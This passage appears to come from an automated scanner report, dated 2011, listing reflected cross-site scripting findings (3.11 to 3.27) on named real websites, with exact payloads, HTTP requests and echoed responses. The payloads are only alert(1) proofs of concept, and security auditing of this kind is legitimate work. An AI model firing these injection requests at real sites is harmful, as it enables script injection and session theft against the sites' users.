<title>You Are Today's Lucky Winner</title
...[SNIP]...
<a href="1-frame.php?subid=1548ea28\"><script>alert(1)</script>a9d824969dc">
...[SNIP]...

3.11. http://www.4shared.com/signUpBox.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/signUpBox.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da0f6'-alert(1)-'1b9de5e53fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signUpBox.jspda0f6'-alert(1)-'1b9de5e53fb HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /signUpBox.jspda0f6'-alert(1)-'1b9de5e53fb
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A75CCE24934C861B753A296F497240D2.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 28 Feb 2011 13:34:19 GMT
Connection: close
Content-Length: 36117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
f loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/signUpBox.jspda0f6'-alert(1)-'1b9de5e53fb',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

3.12. http://www.4shared.com/signUpBox.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/signUpBox.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae457"-alert(1)-"17d23f8f0e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signUpBox.jspae457"-alert(1)-"17d23f8f0e3 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /signUpBox.jspae457"-alert(1)-"17d23f8f0e3
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6168AB99FC4AE226E1202623FE50F782.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 28 Feb 2011 13:34:18 GMT
Connection: close
Content-Length: 36128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/signUpBox.jspae457"-alert(1)-"17d23f8f0e3";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.13. http://www.aiglons.com/fr/offre.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aiglons.com
Path:	/fr/offre.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0caa"><script>alert(1)</script>72dba670e3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/offre.php?c0caa"><script>alert(1)</script>72dba670e3e=1 HTTP/1.1
Host: www.aiglons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:34 GMT
Server: Apache
Set-Cookie: PHPSESSID=764637faqmhd4qt2eojnek5me2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 18142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<a href="http://www.aiglons.com/en/offre.php?c0caa"><script>alert(1)</script>72dba670e3e=1">
...[SNIP]...

3.14. http://www.aisledash.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aisledash.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2abaa"><script>alert(1)</script>20ed5e65567 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2abaa"><script>alert(1)</script>20ed5e65567=1 HTTP/1.1
Host: www.aisledash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:19 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999952
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 50385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://www.aisledash.com/?2abaa"><script>alert(1)</script>20ed5e65567=1" />
...[SNIP]...

3.15. http://www.aolhealth.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aolhealth.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6aaf"><script>alert(1)</script>7f321345f2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c6aaf"><script>alert(1)</script>7f321345f2e=1 HTTP/1.1
Host: www.aolhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:19 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999904
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 53030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.aolhealth.com/?c6aaf"><script>alert(1)</script>7f321345f2e=1">
...[SNIP]...

3.16. http://www.atr.org/obamas-fy-budgetbr-taxes-more-a5844 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.atr.org
Path:	/obamas-fy-budgetbr-taxes-more-a5844

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58a98'-alert(1)-'8ec15fce1e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /obamas-fy-budgetbr-taxes-more-a5844?58a98'-alert(1)-'8ec15fce1e2=1 HTTP/1.1
Host: www.atr.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:23 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: show_popup=1; expires=Wed, 30-Apr-2014 23:21:03 GMT
Set-Cookie: PHPSESSID=s0uir5ct53obaj6a07u4folde4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" cont
...[SNIP]...

var disqus_shortname = 'atrorg'; // required: replace example with your forum shortname
var disqus_identifier = 'a5844';
var disqus_url = 'http://www.atr.org/obamas-fy-budgetbr-taxes-more-a5844?58a98'-alert(1)-'8ec15fce1e2=1';

// The following are highly recommended additional parameters. Remove the slashes in front to use.
// var disqus_identifier = 'unique_dynamic_id_1234';
// var disqus_url = 'http://exa
...[SNIP]...

3.17. http://www.au2m8.com/v/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.au2m8.com
Path:	/v/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e255a"><script>alert(1)</script>6cc3106081f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v/?e255a"><script>alert(1)</script>6cc3106081f=1 HTTP/1.1
Host: www.au2m8.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=NQJKKYS192.168.100.218CKOWJ; path=/
Date: Mon, 28 Feb 2011 13:34:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Cache-Control: max-age=0, no-cache, must-revalidate, proxy-revalidate, s-maxage=0
Expires: Mon, 28 Feb 2011 13:34:22 GMT
Last-Modified: Mon, 28 Feb 2011 13:34:22 GMT
Set-Cookie: countryID=us; expires=Tue, 28-Feb-2012 13:34:22 GMT; path=/; domain=.au2m8.com
Set-Cookie: bpl1298903662=1298900062; expires=Mon, 28-Feb-2011 14:34:22 GMT; path=/; domain=.au2m8.com
Set-Cookie: videoID=expired; expires=Mon, 28-Feb-2011 14:34:22 GMT; path=/; domain=.au2m8.com
Set-Cookie: auto=expired; expires=Mon, 28-Feb-2011 14:34:22 GMT; path=/; domain=.au2m8.com
Set-Cookie: playlist=deleted; expires=Sun, 28-Feb-2010 13:34:21 GMT; path=/; domain=.au2m8.com
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13234

...<html>
    <head>
    <meat http-equiv="Expires" CONTENT="Mon, 28 Feb 2011 13:34:22 GMT">
    <title>Le Roomster De Gonzague - D..fi n..6</title>
    <style type='text/css'>

...[SNIP]...
<a href="/v/?e255a"><script>alert(1)</script>6cc3106081f=1&auto=1&yuhn=3547&videoID=3603" onclick="return playVideo('contentBox','/v/?e255a">
...[SNIP]...

3.18. http://www.autoblog.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autoblog.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39be0"><script>alert(1)</script>44f12833cdf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?39be0"><script>alert(1)</script>44f12833cdf=1 HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:22 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Keep-Alive: timeout=5, max=999991
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 94720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.autoblog.com/?39be0"><script>alert(1)</script>44f12833cdf=1"/>
...[SNIP]...

3.19. http://www.autoblog.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autoblog.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ef27"-alert(1)-"0ec72329a14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?1ef27"-alert(1)-"0ec72329a14=1 HTTP/1.1
Host: www.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:22 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Keep-Alive: timeout=5, max=999998
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 94646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
5.channel="wb.autoblog";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,autoblog.com";
s_265.mmxgo = true;
s_265.prop1="Autoblog";
s_265.prop2="Home";
s_265.prop12="http://www.autoblog.com/?1ef27"-alert(1)-"0ec72329a14=1";
s_265.prop16="Autoblog — We Obsessively Cover The Auto Industry";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="dtc";
s_265.prop22="8";
s_265.prop23="";

...[SNIP]...

3.20. http://www.babypronto.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.babypronto.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 984d6'><script>alert(1)</script>05fe1b28849 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?984d6'><script>alert(1)</script>05fe1b28849=1 HTTP/1.1
Host: www.babypronto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:26 GMT
Server: Apache/2.2.4 (Fedora)
Set-Cookie: JSESSIONID=A8E1897C9D42DB82BBD15406620451C1; Path=/
Set-Cookie: SESSIONID=-569663744; Domain=.babypronto.com; Path=/
Set-Cookie: abt=ProntoV3_5_6-1.171-cellNum_5; Domain=.babypronto.com; Expires=Wed, 30-Mar-2011 13:34:26 GMT; Path=/
Set-Cookie: entryPoint=direct; Domain=.babypronto.com; Path=/
Set-Cookie: M_ID=b606989-12e6c6e1692--1f5f; Domain=.babypronto.com; Expires=Wed, 27-Feb-2013 13:34:26 GMT; Path=/
Set-Cookie: V_ID=b606989-12e6c6e1692--1f5e; Domain=.babypronto.com; Path=/
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
_eep-Alive: timeout=15
_onnection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Via: CN-5000
Connection: close
Content-Length: 128906

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN
...[SNIP]...
<meta content='http://www.babypronto.com/?984d6'><script>alert(1)</script>05fe1b28849=1' property='og:url'/>
...[SNIP]...

3.21. http://www.battlefieldheroes.com/frontpage/landingPage [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.battlefieldheroes.com
Path:	/frontpage/landingPage

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e6c"><script>alert(1)</script>bcc32bb5b0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /frontpagee3e6c"><script>alert(1)</script>bcc32bb5b0a/landingPage HTTP/1.1
Host: www.battlefieldheroes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:34:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: magma=227bp1lpr4dkecbig98lorjme1; path=/
Set-Cookie: language=en; expires=Tue, 28-Feb-2012 13:34:28 GMT; path=/
Vary: Accept-Encoding
X-Orig-Server: (null)
Keep-Alive: timeout=2, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 12302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="
...[SNIP]...
<a
href="/en/frontpagee3e6c"><script>alert(1)</script>bcc32bb5b0a/landingPage">
...[SNIP]...

3.22. http://www.battlefieldheroes.com/frontpage/landingPage [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.battlefieldheroes.com
Path:	/frontpage/landingPage

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a048"><script>alert(1)</script>d00a8847f19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /frontpage/landingPage7a048"><script>alert(1)</script>d00a8847f19 HTTP/1.1
Host: www.battlefieldheroes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:34:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: magma=oa7c3arfgsc0253pjl41f59m24; path=/
Set-Cookie: language=en; expires=Tue, 28-Feb-2012 13:34:30 GMT; path=/
Vary: Accept-Encoding
X-Orig-Server: (null)
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 12302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="
...[SNIP]...
<a
href="/en/frontpage/landingPage7a048"><script>alert(1)</script>d00a8847f19">
...[SNIP]...

3.23. http://www.battlefieldheroes.com/frontpage/landingPage [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.battlefieldheroes.com
Path:	/frontpage/landingPage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29a91"><script>alert(1)</script>57ce7fb2168 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /frontpage/landingPage?29a91"><script>alert(1)</script>57ce7fb2168=1 HTTP/1.1
Host: www.battlefieldheroes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: magma=2hh7rcjidvhm8j6cctapceclv5; path=/
Set-Cookie: language=en; expires=Tue, 28-Feb-2012 13:34:25 GMT; path=/
Set-Cookie: hasVisitedLandingPage=1; expires=Sun, 22-Sep-2109 13:34:25 GMT; path=/
Vary: Accept-Encoding
X-Orig-Server: (null)
Keep-Alive: timeout=2, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<a
href="/en/frontpage/landingPage?29a91"><script>alert(1)</script>57ce7fb2168=1">
...[SNIP]...

3.24. http://www.bendbulletin.com/apps/pbcs.dll/article [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.bendbulletin.com
Path:	/apps/pbcs.dll/article

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a970"><a>2486dda6de9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /apps/pbcs.dll/article?9a970"><a>2486dda6de9=1 HTTP/1.1
Host: www.bendbulletin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Content-Length: 32011
Content-Type: text/html; charset=Iso-8859-1
Last-Modified: Mon, 28 Feb 2011 13:35:11 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: PBCSSESSIONID=473419620110152; path=/
X-Passed-To: S260608AT1VW732, URL Rewrite on site N/A (2011-02-28 08:35:09:918)
X-Handled-By: S260608AT1VW732, Rewrite on site N/A
X-Actual-URL: S260608AT1VW732, (/apps/pbcs.dll/article?9a970"><a>2486dda6de9=1)
X-Passed-To-DLL: S260608AT1VW732, (2011-02-28 08:35:09:918)
X-Passed-To-BeforeDispatch: S260608AT1VW732, on site BB (2011-02-28 08:35:09:918)
X-Returned-From-BeforeDispatch: S260608AT1VW732, on site BB (2011-02-28 08:35:10:371)
X-Passed-To-PostProcessResponse: S260608AT1VW732, on site BB (2011-02-28 08:35:15:199)
X-Returned-From-PostProcessResponse: S260608AT1VW732, on site BB (2011-02-28 08:35:15:199)
X-Returned-From-DLL: S260608AT1VW732 (2011-02-28 08:35:15:199)
X-Returned-From: S260608AT1VW732(2011-02-28 08:35:15:199)
Date: Mon, 28 Feb 2011 13:35:14 GMT
X-Cache: MISS from sxsquid03
X-Cache-Lookup: MISS from sxsquid03:80
Via: 1.0 sxsquid03 (squid/3.0.STABLE18)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lan
...[SNIP]...
<a href="/apps/pbcs.dll/article?9a970"><a>2486dda6de9=1&template=print">
...[SNIP]...

3.25. http://www.bizfind.us/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bizfind.us
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 800c2"><script>alert(1)</script>5405092905c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?800c2"><script>alert(1)</script>5405092905c=1 HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/15/182221'/abc-development-inc/chicago.aspx/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQABTDA=AEMEPKABKNLGLDHJGGFBJOHM; __utmz=252525594.1298901533.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=252525594.1551423665.1298901533.1298901533.1298901533.1; __utmc=252525594; __utmb=252525594.1.10.1298901533

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:00:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 15800
Content-Type: text/html
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Bizfind - PORTAL OF USA COMPANIES</title>
<meta name="descrip
...[SNIP]...
<a href="http://www.bizfind.us/Index.asp?800c2"><script>alert(1)</script>5405092905c=1" rel="nofollow">
...[SNIP]...

3.26. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bizfind.us
Path:	/15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c429f"><script>alert(1)</script>5947cca3a97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /15/182221/abc-development-inc/chicago.aspx/x22?c429f"><script>alert(1)</script>5947cca3a97=1 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 28 Feb 2011 13:34:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11704
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQABTDA=JBMEPKABJLJNPNOAGJMKEJLC; path=/
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...
<a href="http://www.bizfind.us/schedaazienda.asp?idregione=15&isid=182221&ragionesociale=abc-development-inc&idcomune1=chicago/x22&c429f"><script>alert(1)</script>5947cca3a97=1" rel="nofollow">
...[SNIP]...

3.27. http://www.bizfind.us/44/811103/1/attorneys/dallas.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bizfind.us
Path:	/44/811103/1/attorneys/dallas.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92880"><script>alert(1)</script>93b4e678caa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /44/811103/1/attorneys/dallas.aspx?92880"><script>alert(1)</script>93b4e678caa=1 HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/cat/44/1/37711/dallas.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
